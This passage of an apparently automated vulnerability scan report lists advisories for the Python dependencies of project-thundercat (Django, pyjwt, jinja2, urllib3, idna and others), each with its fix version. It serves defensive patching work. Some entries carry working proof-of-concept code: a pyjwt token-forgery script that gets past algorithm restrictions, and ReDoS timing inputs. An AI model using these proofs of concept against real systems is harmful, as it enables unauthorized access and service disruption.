Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.25.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Access Restriction Bypass. HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths.

Remediation

Upgrade Django to version 2.2.25, 3.1.14, 3.2.10 or higher.

References

Access Restriction Bypass vulnerability report

medium severity

Arbitrary File Upload

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.19.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Arbitrary File Upload by bypassing of validation of all but the last file when uploading multiple files using a single forms.FileField or forms.ImageField.

Remediation

Upgrade django to version 3.2.19, 4.1.9, 4.2.1 or higher.

References

Arbitrary File Upload vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.26.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Denial of Service (DoS) via UserAttributeSimilarityValidator, when evaluating submitted passwords that are extremely large relatively to the comparison values. This issue is mitigated in newer versions by ignoring long values in UserAttributeSimilarityValidator.

Note: it is exploitable under the assumption that access to user registration is unrestricted.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade Django to version 2.2.26, 3.2.11, 4.0.1 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Denial of Service (DoS). If passed certain inputs, django.utils.encoding.uri_to_iri could lead to significant memory usage due to a recursion when repercent-encoding invalid UTF-8 octet sequences.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade Django to version 1.11.23, 2.1.11, 2.2.4 or higher.

References

Django Security Advisory

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Denial of Service (DoS). Due to the behaviour of the underlying HTMLParser, django.utils.html.strip_tags would be extremely slow to evaluate certain inputs containing large sequences of nested incomplete HTML entities.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade Django to version 1.11.23, 2.1.11, 2.2.4 or higher.

References

Django Security Advisory

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Denial of Service (DoS). If django.utils.text.Truncator's chars() and words() methods were passed the html=True argument, they were extremely slow to evaluate certain inputs due to a catastrophic backtracking vulnerability in a regular expression. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which were thus vulnerable.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade Django to version 1.11.23, 2.1.11, 2.2.4 or higher.

References

Django Security Advisory

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.23.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via the NFKC normalization function in django.contrib.auth.forms.UsernameField. A potential attack can be executed via certain inputs with a very large number of Unicode characters.

Note: This vulnerability is only exploitable on Windows systems.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 3.2.23, 4.1.13, 4.2.7 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.25.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in django.utils.text.Truncator.words(), whose performance can be degraded when processing a malicious input involving repeated < characters.

Note:

The function is only vulnerable when html=True is set and the truncatewords_html template filter is in use.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade django to version 3.2.25, 4.2.11, 5.0.3 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection. Key and index lookups for django.contrib.postgres.fields.JSONField and key lookups for django.contrib.postgres.fields.HStoreField were subject to SQL injection, using a suitably crafted dictionary, with dictionary expansion, as the **kwargs passed to QuerySet.filter().

Remediation

Upgrade Django to version 1.11.23, 2.1.11, 2.2.4 or higher.

References

Django Security Advisory

SQL Injection vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: djangorestframework
Introduced through: djangorestframework@3.9.3, django-rest-swagger@2.2.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework@3.9.3

Remediation: Upgrade to djangorestframework@3.15.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › djangorestframework@3.9.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › djangorestframework@3.9.3

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

djangorestframework is a powerful and flexible toolkit for building Web APIs.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with <br> tags.

PoC

# views.py
from rest_framework.views import APIView
from rest_framework.response import Response

class Index(APIView):
    def get(self, request):
        username = request.GET.get('username', '')

        response = Response('OK')
        response['Location'] = f'https://x.com/{username}'
        return response

# urls.py
from django.urls import path
urlpatterns = [ path('api/', Index.as_view()), ]

Details

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade djangorestframework to version 3.15.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Insufficient Session Expiration

Vulnerable module: djangorestframework-simplejwt
Introduced through: djangorestframework-simplejwt@4.3.0

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0

Remediation: Upgrade to djangorestframework-simplejwt@5.2.2.

Overview

djangorestframework-simplejwt is an A minimal JSON Web Token authentication plugin for Django REST Framework

Affected versions of this package are vulnerable to Insufficient Session Expiration due to access tokens not expiring.

Remediation

Upgrade djangorestframework-simplejwt to version 5.2.2 or higher.

References

Insufficient Session Expiration vulnerability report

medium severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: jinja2
Introduced through: jinja2@2.10.1, coreschema@0.0.4 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › jinja2@2.10.1

Remediation: Upgrade to jinja2@2.11.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreschema@0.0.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › coreschema@0.0.4 › jinja2@2.10.1

Overview

Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The ReDoS vulnerability is mainly due to the _punctuation_re regex operator and its use of multiple wildcards. The last wildcard is the most exploitable as it searches for trailing punctuation.

This issue can be mitigated by using Markdown to format user content instead of the urlize filter, or by implementing request timeouts or limiting process memory.

PoC by Yeting Li

from jinja2.utils import urlize
from time import perf_counter

for i in range(3):
    text = "abc@" + "." * (i+1)*5000 + "!"
    LEN = len(text)
    BEGIN = perf_counter()
    urlize(text)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade Jinja2 to version 2.11.3 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

new

Improper Verification of Cryptographic Signature

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.13.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature via the jwt.decode or jwt.decode_complete functions when used with a PyJWK key. An attacker can bypass algorithm restrictions and gain unauthorized access to protected resources by signing a token with a disallowed algorithm, setting an allowed algorithm in the JWT header, and leveraging control over a registered JWK/JWKS private key.

PoC

import json
import jwt
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
from jwt.api_jwk import PyJWK
from jwt.algorithms import RSAAlgorithm
from jwt.utils import base64url_encode

# Generate an RSA keypair controlled by the attacker.
priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub = priv.public_key()
pub_pem = pub.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)

# Build a PyJWK from the public key.
# With an RSA JWK and no explicit alg, PyJWK binds to RS256 by default.
jwk = PyJWK.from_json(RSAAlgorithm.to_jwk(pub))

# Create a token whose protected header claims RS512.
header = {"typ": "JWT", "alg": "RS512"}
payload = {"sub": "alice"}

header_b64 = base64url_encode(
    json.dumps(header, separators=(",", ":"), sort_keys=True).encode()
)
payload_b64 = base64url_encode(
    json.dumps(payload, separators=(",", ":")).encode()
)
signing_input = b".".join([header_b64, payload_b64])

# Sign the RS512-labelled token with RS256 instead.
sig = RSAAlgorithm(RSAAlgorithm.SHA256).sign(signing_input, priv)
token = b".".join([header_b64, payload_b64, base64url_encode(sig)]).decode()

print("token:", token)
print("PyJWK path:")
print(jwt.decode(token, jwk, algorithms=["RS512"]))

print("PEM path:")
try:
    print(jwt.decode(token, pub_pem, algorithms=["RS512"]))
except Exception as e:
    print(f"{type(e).__name__}: {e}")

Remediation

Upgrade pyjwt to version 2.13.0 or higher.

References

Improper Verification of Cryptographic Signature vulnerability report

medium severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@1.26.5.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the SUBAUTHORITY_PAT regex pattern in src/urllib3/util/url.py.

If a URL is passed as a parameter or redirected to via an HTTP redirect and it contains many @ characters in the authority component, the authority regular expression exhibits catastrophic backtracking, causing a denial of service.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade urllib3 to version 1.26.5 or higher.

References

GitHub Commit

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

new

Regular Expression Denial of Service (ReDoS)

Vulnerable module: idna
Introduced through: idna@2.8, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › idna@2.8

Remediation: Upgrade to idna@3.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › idna@2.8

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › idna@2.8

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the idna.encode() function when processing very large domain name inputs that exploit the valid_contexto() function before length validation. This is triggered by arbitrarily large inputs that would not occur in normal usage, like "\u0660" * N or "\u30fb" * N + "\u6f22" for large N. Such values may be passed to the library if there is no preliminary input validation by the higher-level application.

Note: This is a bypass of the fix for the vulnerability described in CVE-2024-3651.

Workaround

This vulnerability can be mitigated by enforcing a maximum domain name length of 253 characters before passing input to the function.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade idna to version 3.15 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.27.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

